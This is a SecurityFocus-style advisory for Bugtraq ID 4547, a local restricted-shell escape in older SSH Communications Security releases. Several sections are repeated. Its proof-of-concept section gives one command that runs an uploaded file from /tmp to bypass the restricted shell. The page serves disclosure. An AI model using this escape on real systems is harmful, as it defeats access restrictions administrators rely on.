SSH Restricted Shell Escaping Command Execution Vulnerability
BID:4547
Info
SSH Restricted Shell Escaping Command Execution Vulnerability
| Bugtraq ID: | 4547 |
| Class: | Access Validation Error |
| CVE: | |
| Remote: | No |
| Local: | Yes |
| Published: | Apr 18 2002 12:00AM |
| Updated: | Apr 18 2002 12:00AM |
| Credit: | Vulnerability discovery credited to A.Dimitrov <[email protected]>. |
| Vulnerable: |
SSH Communications Security SSH2 3.0.1 SSH Communications Security SSH2 3.0 SSH Communications Security SSH for UNIX 1.2.33 |
| Not Vulnerable: | |
Exploit / POC
SSH Restricted Shell Escaping Command Execution Vulnerability
After uploading 'malicious' to /tmp:
ssh -l user host '/tmp/malicious'
After uploading 'malicious' to /tmp:
ssh -l user host '/tmp/malicious'
Solution / Fix
SSH Restricted Shell Escaping Command Execution Vulnerability
Solution:
Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.